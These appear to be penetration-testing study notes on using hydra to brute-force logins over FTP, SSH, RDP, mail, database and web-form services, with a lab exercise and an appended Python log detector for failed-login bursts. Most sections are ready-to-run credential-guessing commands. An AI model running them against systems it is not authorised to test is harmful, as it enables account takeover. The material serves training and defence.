# Introduction

- `hydra` is a fast network login cracker that supports numerous attack protocols
- Can be used against web apps, FTP, SSH, etc.
- See help menu with `hydra -h`

```bash
hydra -l <username> -p <password> ftp://<ip_addr>
hydra -L <user_list> -P <password_list> ssh://<ip_addr>
```

|Hydra Service|Service/Protocol|Description|Example Command|
|---|---|---|---|
|ftp|File Transfer Protocol (FTP)|Used to brute-force login credentials for FTP services, commonly used to transfer files over a network.|`hydra -l admin -P /path/to/password_list.txt ftp://192.168.1.100`|
|ssh|Secure Shell (SSH)|Targets SSH services to brute-force credentials, commonly used for secure remote login to systems.|`hydra -l root -P /path/to/password_list.txt ssh://192.168.1.100`|
|http-get/post|HTTP Web Services|Used to brute-force login credentials for HTTP web login forms using either GET or POST requests.|`hydra -l admin -P /path/to/password_list.txt <ip_addr> http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"`|
|smtp|Simple Mail Transfer Protocol|Attacks email servers by brute-forcing login credentials for SMTP, commonly used to send emails.|`hydra -l admin -P /path/to/password_list.txt smtp://mail.server.com`|
|pop3|Post Office Protocol (POP3)|Targets email retrieval services to brute-force credentials for POP3 login.|`hydra -l [email protected] -P /path/to/password_list.txt pop3://mail.server.com`|
|imap|Internet Message Access Protocol|Used to brute-force credentials for IMAP services, which allow users to access their email remotely.|`hydra -l [email protected] -P /path/to/password_list.txt imap://mail.server.com`|
|mysql|MySQL Database|Attempts to brute-force login credentials for MySQL databases.|`hydra -l root -P /path/to/password_list.txt mysql://192.168.1.100`|
|mssql|Microsoft SQL Server|Targets Microsoft SQL servers to brute-force database login credentials.|`hydra -l sa -P /path/to/password_list.txt mssql://192.168.1.100`|
|vnc|Virtual Network Computing (VNC)|Brute-forces VNC services, used for remote desktop access.|`hydra -P /path/to/password_list.txt vnc://192.168.1.100`|
|rdp|Remote Desktop Protocol (RDP)|Targets Microsoft RDP services for remote login brute-forcing.|`hydra -l admin -P /path/to/password_list.txt rdp://192.168.1.100`|

## Brute-Forcing HTTP Authentication

```bash
hydra -L usernames.txt -P password.txt example.com http-get
```

## Targeting Multiple SSH Servers

```bash
# -l sets a single login name (-u only changes the loop order and takes no argument)
hydra -l <user> -p <password> -M targets.txt ssh
```

## Testing FTP Creds Against a Non-Standard Port

```bash
hydra -L usernames.txt -p <password> -s 2121 -V ftp.example.com ftp
# -V flag for extra verbose
```

## Brute-Forcing a Web Login Form

```bash
hydra -l <user> -P passwords.txt example.com http-post-form "/login:user=^USER^&pass=^PASS^:S=302"
# here we employ the http-post-form module with the specified form parameters, where a successful login results in a 302 status code
```

## Advanced RDP Brute-Forcing

```bash
hydra -l user -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 <ip_addr> rdp
# here we generate test passwords ranging from 6 to 8 characters, using the specified character set
```

# Basic HTTP Authentication

- Web apps often employ authentication to protect sensitive data and functionalities
- Basic auth is a rudimentary challenge-response protocol
- Below is an example GET request header using basic auth

```http
GET /protected_resource HTTP/1.1
Host: www.example.com
Authorization: Basic YWxpY2U6c2VjcmV0MTIz
```

- Use `hydra` to brute-force HTTP basic auth with a known username

```bash
hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt 127.0.0.1 http-get / -s 81
# here the target service is an HTTP server and the attack should be performed using HTTP GET requests to the root path ('/')
# we also override the default HTTP port with port 81
```

![[images/Pasted image 20251117202206.png]]
![[images/Pasted image 20251117202314.png]]
![[images/Pasted image 20251117202327.png]]

# Security Forms

- While login forms appear as simple boxes asking for username and password, they represent an interplay between client and server-side technologies
- Example A login form structure

```html
<form action="/login" method="post">
  <label for="username">Username:</label>
  <input type="text" id="username" name="username"><br><br>
  <label for="password">Password:</label>
  <input type="password" id="password" name="password"><br><br>
  <input type="submit" value="Submit">
</form>
```

- Example B login form structure

```html
<form method="POST">
  <h2>Login</h2>
  <label for="username">Username:</label>
  <input type="text" id="username" name="username">
  <label for="password">Password:</label>
  <input type="password" id="password" name="password">
  <input type="submit" value="Login">
</form>
```

- When submitted, the above form sends an HTTP POST request to the `/login` endpoint on the server
- Below is an example HTTP POST request header

```http
POST /login HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

username=john&password=secret123
```

- We can use the `http-post-form` module from `hydra` to brute-force the creds
- Construction of the parameters string is crucial to success

```bash
# example syntax for various parameter strings

# Failure = Invalid credentials
hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid credentials"

# Success = 302
hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=302"

# Success = Dashboard
hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=Dashboard"
```

- Explanation for first example above
  - The form submits data to the root path (`/`)
  - The username field is named `username`
  - The password field is named `password`
  - An error message "Invalid credentials" is displayed upon failed login
- After inspecting the form, open your browser's Developer Tools (F12) and navigate to the "Network" tab. Submit a sample login attempt with any credentials. This will allow you to see the POST request sent to the server. In the "Network" tab, find the request corresponding to the form submission and check the form data, headers, and the server’s response

![[images/Pasted image 20251117203038.png]]

- Example full `hydra` command

```bash
hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f IP -s 5000 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"
```

# Exercise

- Visit site

![[images/Pasted image 20251117203150.png]]

- Source Code [Ctrl+U]

![[images/Pasted image 20251117203733.png]]

- Dev tools [F12]

![[images/Pasted image 20251117203250.png]]

- Run `hydra` command

![[images/Pasted image 20251117204015.png]]
![[images/Pasted image 20251117204052.png]]
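
The login-form brute-forcing covered in these notes, seen from the server's access log: this is an added example, not part of the original notes. It flags a source that sends a burst of failed `POST /login` requests and escalates when a success follows the burst. The log format, the `/login` path, the "302 means success" rule (mirroring the `S=302` condition above), the thresholds and all names are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample access-log lines (common log format); not from the page.
_FMT = '{ip} - - [17/Nov/2025:20:{mm:02d}:{ss:02d} +0000] "POST /login HTTP/1.1" {status} 512'
SAMPLE_LINES = (
    # six failed logins, one second apart, from one source ...
    [_FMT.format(ip="10.0.0.7", mm=40, ss=s, status=200) for s in range(6)]
    # ... followed by a redirect, i.e. a guess that worked
    + [_FMT.format(ip="10.0.0.7", mm=40, ss=6, status=302)]
    # an ordinary user: one typo, then a successful login
    + [_FMT.format(ip="10.0.0.9", mm=41, ss=0, status=200),
       _FMT.format(ip="10.0.0.9", mm=41, ss=5, status=302)]
)

LINE_RE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def detect(lines, login_path="/login", threshold=5, window=timedelta(seconds=60)):
    """Return {source_ip: verdict} for sources with bursts of failed logins."""
    recent = defaultdict(deque)   # source IP -> timestamps of failures in the window
    verdicts = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue              # not in the expected log format
        ip, ts, method, path, status = m.groups()
        if method != "POST" or path.split("?")[0] != login_path:
            continue              # only login submissions are of interest
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        q = recent[ip]
        while q and when - q[0] > window:
            q.popleft()           # drop failures that fell out of the window
        if status == "302":       # assumption: the app redirects on success
            if len(q) >= threshold:
                verdicts[ip] = "success-after-burst"
            q.clear()
        else:
            q.append(when)
            if len(q) >= threshold:
                verdicts.setdefault(ip, "burst")
    return verdicts

if __name__ == "__main__":
    for ip, verdict in detect(SAMPLE_LINES).items():
        print(ip, verdict)
```

A `success-after-burst` verdict is the one to triage first, since it means a guessed credential was accepted; a plain `burst` is the point at which rate limiting or lockout should already have engaged.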